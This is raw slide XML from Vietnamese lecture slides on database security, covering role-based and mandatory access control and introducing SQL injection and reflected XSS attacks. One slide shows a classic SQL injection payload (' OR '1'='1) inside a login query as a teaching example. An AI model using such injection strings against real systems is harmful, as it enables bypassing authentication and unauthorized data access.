                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Ví dụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1">
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Vai trò "Người quản trị hệ thống" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>có quyền truy cập vào tất cả các bảng dữ liệu, thực hiện các hoạt động như </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>thêm, sửa, xóa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>cơ sở dữ liệu và quản lý tài khoản người dùng. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Vai trò "Khách hàng" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>chỉ có quyền truy cập vào dữ liệu cá nhân của họ, như lịch sử giao dịch và thông tin tài khoản.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DB54FED-40B8-585D-FFEF-D823DFF1E493}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1197030" y="7937126"/>
            <a:ext cx="10648947" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Thể hiện sự </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>phân chia rõ ràng về vai trò và quyền hạn, giúp tăng cường an ninh và tuân thủ quy trình trong tổ chức.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18C98644-6A5F-B4F5-368A-941152366491}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11963400" y="3577107"/>
            <a:ext cx="5193027" cy="5833593"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Slide Number Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7FA2628-9B82-180D-DDF3-3E02211F62EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8033279" y="9809032"/>
            <a:ext cx="65352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11</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1456324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D278905-418D-3162-1EBE-51A900D3E92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56EC57-1CA7-E828-AC9B-6CC5C63E307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E4242AE-E8EA-82B1-F124-DE6DC72B53C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1244828" y="2654163"/>
            <a:ext cx="9863328"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200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="32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B1CE218-775F-DAB4-EB46-7E4BF0C3B118}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="323751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Mô hình kiểm soát truy cập bắt buộc (MAC)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A59A33F-EEF6-95EA-06ED-11F8191D6F66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1273176" y="3888719"/>
            <a:ext cx="9736403" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Nhằm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>hạn chế khả năng mà chủ sở hữu tài nguyên riêng lẻ phải cấp hoặc từ chối quyền truy cập vào các đối tượng tài nguyên trong hệ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>thống tệp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9BE7266-53F9-A626-1D4B-17B0A83422AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1282212" y="5491161"/>
            <a:ext cx="9650717" cy="2400657"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="30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30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3000" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="373D3F"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>dữ liệu “tuyệt mật” được cung cấp cho một nhóm người dựa trên mức độ để truy cập các tài liệu “tuyệt mật” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="373D3F"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="373D3F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>có quyền truy cập vào thông tin ở cấp độ thấp hơn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="373D3F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="373D3F"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>. N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="373D3F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>hưng những nhân viên </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="373D3F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>có </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="373D3F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>quyền thấp hơn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="373D3F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> sẽ không có quyền truy cập vào thông tin được phân loại ở </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="373D3F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>cấp độ cao hơn.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000"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ADC9688-FF9B-5333-9B44-189C6DD89166}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11209300" y="3560028"/>
            <a:ext cx="6158694" cy="5276928"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Slide Number Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39A3D23C-01BC-602C-3D0B-8AA8E9F163DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7713968" y="9089676"/>
            <a:ext cx="8275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12</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165736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4EA4-AC53-E082-DCEE-C74E19038F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8FDB6A-ED30-EA7D-0C8D-8B7EBE4FA2FD}"/>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9C1CDEF-43B6-80B8-7B1A-3EC881EC15A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1DB91F7-E91C-AE59-3419-F7138CC8D675}"/>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ED1BE891-C9F1-2DF3-5A82-7FA564C0020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19DC9DC-51FD-89E0-0F08-32C8443B6A2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01FB2E2-B909-6B21-5EED-C00C0969E8A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1128929" y="2916699"/>
            <a:ext cx="12282271" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Các cuộc tấn công có thể từ nhiều nguyên nhân (lỗ hổng ) khác nhau</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E0BBCF-A306-7FDE-F88B-4840AFC94A2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1113689" y="402475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3.1 Tấn công SQL Injection</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88A448-F015-0709-F115-469AE326846F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1128929" y="4770027"/>
            <a:ext cx="8679741" cy="2631490"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Đầu vào được gán cho </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>các </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>biến input1 và input2 và nội dung của biến đó sẽ được sử dụng để tự động tạo truy vấn câu lệnh SQL như</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> sau:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="è"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Ví dụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>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SELECT * FROM tbl_user WHERE username =  ' ' OR '1' = '1’</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AC02664-C891-F556-7420-8C9AECC6170F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9945269" y="3591939"/>
            <a:ext cx="7751273" cy="5055249"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF524F44-140B-362F-B22D-42DE1D172B89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12008040" y="8699016"/>
            <a:ext cx="4267199" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Tấn công SQL Injection</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2800" b="1" i="0">
              <a:solidFill>
                <a:srgbClr val="1B1B1B"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70B23572-8F80-FDC3-BCAD-2B013AE1F655}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7876664" y="9069258"/>
            <a:ext cx="67519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13</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18625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780C51B3-1C39-F3D6-61B1-D48513633031}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="533400" y="2095499"/>
            <a:ext cx="17602199" cy="8063089"/>
            <a:chOff x="40798" y="71151"/>
            <a:chExt cx="3271246" cy="2164112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main"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8DE5E8F-3B54-5419-DCAA-2DC10C525997}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="965202" y="2267318"/>
            <a:ext cx="11049000" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pP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vi-VN"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Các cuộc tấn công có thể từ nhiều nguyên nhân (lỗ hổng) khác nhau</a:t>
            </a:r>
            <a:endPar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76A559-FC04-E6A7-4EFA-A2EC2D2B6F90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="933195" y="3418945"/>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3.2 Tấn công Reflected XSS</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5901E13-8050-B840-6930-CA719FF60921}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10124142" y="3162300"/>
            <a:ext cx="7923070" cy="6432624"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
